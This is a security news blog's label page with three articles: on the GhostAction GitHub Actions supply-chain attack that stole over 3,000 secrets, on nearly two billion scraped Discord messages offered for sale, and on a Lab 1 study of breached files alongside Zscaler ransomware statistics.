Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label leaked sensitive data. Show all posts
Malware Attack
Cyber Attacks Cyber Hackers Data Leak data security Data Transfer Database Security GitHub leaked sensitive data Malicious Files Malware Attack

GitHub Supply Chain Attack ‘GhostAction’ Exposes Over 3,000 Secrets Across Ecosystems

 

A newly uncovered supply chain attack on GitHub, named GhostAction, has compromised more than 3,300 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The campaign was first identified by GitGuardian researchers, who traced initial signs of suspicious activity in the FastUUID project on September 2, 2025. The attack relied on compromised maintainer accounts, which were used to commit malicious workflow files into repositories. These GitHub Actions workflows were configured to trigger automatically on push events or manual dispatch, enabling the attackers to extract sensitive information. 

Once executed, the malicious workflow harvested secrets from GitHub Actions environments and transmitted them to an attacker-controlled server through a curl POST request. In FastUUID’s case, the attackers accessed the project’s PyPI token, although no malicious package versions were published before the compromise was detected and contained. Further investigation revealed that the attack extended well beyond a single project. Researchers found similar workflow injections across at least 817 repositories, all exfiltrating data to the same domain. To maximize impact, the attackers enumerated secret variables from existing legitimate workflows and embedded them into their own files, ensuring multiple types of secrets could be stolen. 

GitGuardian publicly disclosed the findings on September 5, raising issues in 573 affected repositories and notifying security teams at GitHub, npm, and PyPI. By that time, about 100 repositories had already identified the unauthorized commits and reverted them. Soon after the disclosures, the exfiltration endpoint used by the attackers went offline, halting further data transfers. 

The scope of the incident is significant, with researchers estimating that roughly 3,325 secrets were exposed. These included API tokens, access keys, and database credentials spanning several major platforms. At least nine npm packages and 15 PyPI projects remain directly affected, with the risk that compromised tokens could allow the release of malicious or trojanized versions if not revoked. GitGuardian noted that some companies had their entire SDK portfolios compromised, with repositories in Python, Rust, JavaScript, and Go impacted simultaneously. 

While the attack bears some resemblance to the s1ngularity campaign reported in late August, GitGuardian stated that it does not see a direct connection between the two. Instead, GhostAction appears to represent a distinct, large-scale attempt to exploit open-source ecosystems through stolen maintainer credentials and poisoned automation workflows. The findings underscore the growing challenges in securing supply chains that depend heavily on public code repositories and automated build systems.
Read more »
Personal Information
Dark Web Data Breach data security Data Theft Discord Discord Users leaked sensitive data personal data security Personal Information

Nearly Two Billion Discord Messages Scraped and Sold on Dark Web Forums

 

Security experts have raised alarms after discovering that a massive collection of Discord data is being offered for sale on underground forums. According to researchers at Cybernews, who reviewed the advertisement, the archive reportedly contains close to two billion messages scraped from the platform, alongside additional sensitive information. The dataset allegedly includes 1.8 billion chat messages, records of 35 million users, 207 million voice sessions, and data from 6,000 servers, all available to anyone willing to pay. 

Discord, a platform widely used for gaming, social communities, and professional groups, enables users to connect via text, voice, and video across servers organized around different interests. Many of these servers are open to the public, meaning their content—including usernames, conversations, and community activity—can be accessed by anyone who joins. While much of this information is publicly visible, the large-scale automated scraping of data still violates Discord’s Terms of Service and could potentially breach data protection regulations such as the EU’s General Data Protection Regulation (GDPR) or California’s Consumer Privacy Act (CCPA).

The true sensitivity of the dataset remains unclear, as no full forensic analysis has been conducted. It is possible that a significant portion of the messages and voice records were collected from publicly accessible servers, which would reduce—but not eliminate—the privacy concerns. However, the act of compiling, distributing, and selling this information at scale introduces new risks, such as the misuse of user data for surveillance, targeted phishing, or identity exploitation. 

Discord has faced similar challenges before. In April 2024, a service known as Spy.Pet attempted to sell billions of archived chat logs from the platform. That operation was swiftly shut down by Discord, which banned the associated accounts and confirmed that the activity violated its rules. At the time, the company emphasized that automated scraping and self-botting were not permitted under its Terms of Service and stated it was exploring possible legal action against offenders. 

The recurrence of large-scale scraping attempts highlights the ongoing tension between the open nature of platforms like Discord and the privacy expectations of their users. While public servers are designed for accessibility and community growth, they can also be exploited by malicious actors seeking to harvest data en masse. Even if the information being sold in the latest case is largely public, the potential to cross-reference user activity across communities raises broader concerns about surveillance and abuse. 

As of now, Discord has not issued an official statement on this latest incident, but based on previous responses, it is likely the company will take steps to disrupt the sale and enforce its policies against scraping. The incident serves as another reminder that users on open platforms should remain mindful of the visibility of their activity and that service providers must continue to balance openness with strong protections against data misuse.
Read more »
unstructured data risk
cyberattack trends Data Breach data breach analysis Lab 1 report leaked sensitive data ransomware attacks 2025 unstructured data risk

141M Files Analyzed: Alarming New Report Reveals True Scale and Impact of Data Breach

 

A comprehensive new study analyzing over 141 million files from 1,297 ransomware and data breach incidents has shed disturbing light on the real risks of modern cyberattacks—particularly the overlooked threat of unstructured data. The research, conducted by cybersecurity firm Lab 1, is being termed the “biggest ever content-level analysis of breached datasets” and offers deep insights into the fallout of these breaches.

While the total number of files may not seem extraordinary when compared to criminal databases boasting 16 billion credentials or the recent exposure of 184 million plaintext passwords, it’s the content of these files that makes this report especially urgent.

According to Robin Brattel, CEO of Lab 1, unlike most analyses that focus on structured data like login credentials, this report examined unstructured files, often housing highly sensitive information. “The analysis focused on the huge risks associated with unstructured files that often hold high-value information, such as cryptographic keys, customer account data, or sensitive commercial contracts,” Brattel noted.

The findings are staggering:

  1. Financial documents were present in 93% of incidents and made up 41% of all files analyzed.
  2. 49% of breaches contained bank statements, and 36% included International Bank Account Numbers (IBANs).
  3. 14% involved wealth statements, and 82% of breaches exposed personal or corporate identifiable information (PII).
  4. 67% of that breached PII came from customer service interactions.
  5. 51% included email leaks that exposed U.S. Social Security numbers.
  6. On average, 54 email addresses were compromised per breach.
  7. Cryptographic keys were discovered in 18% of incidents, with code files accounting for 17%.
  8. System logs appeared in 79%, and images in 81% of cases.

The average breach, according to Lab 1, contains 22,647 files and 13.44 GB of data, with 14 different file types and 22 classifications. Most alarmingly, each breach impacts an average of 482 organizations, demonstrating the far-reaching “blast radius” of cyber incidents.

The report explains that this blast radius has grown 61% over the past three years, significantly increasing systemic risk, regulatory exposure, and reputational damage. Many affected entities are nth-party connections in the supply chain—organizations completely unaware of their data exposure.

In extreme cases, the number of impacted organizations reached 1.73 million in a single breach, while the financial services sector saw an average impact of 4,468 organizations per breach.

As Damian Sutcliffe, former CIO (EMEA) at Goldman Sachs, warns: “We need to stop thinking of breaches as isolated incidents… [the risk] applies to not just that held within our systems, but information held across our entire supply chain.”

Another recent study—the 2025 Ransomware Report by Zscaler ThreatLabz—reinforces these concerns. Deepen Desai, executive VP of cybersecurity at Zscaler, noted a shift in tactics: “Ransomware tactics continue to evolve, with the growing shift toward extortion over encryption as a clear example.” The use of GenAI by attackers has further amplified the threat, enabling more targeted and efficient breaches.

The Zscaler report found:

  • A 146% year-over-year surge in ransomware attacks blocked by its cloud platform.
  • A 92% increase in exfiltrated data volume among the top 10 ransomware groups.
  • Total data stolen rose from 123 TB to 238 TB in just one year.

This escalating trend shows that ransomware is no longer just about locking systems—it’s about weaponizing stolen data.

As cybercriminals increasingly behave like data scientists, capable of mining massive datasets for exploitable intelligence, the need to secure not just networks, but also the unstructured data within them, has never been more critical.
Read more »
Subscribe to: Posts (Atom)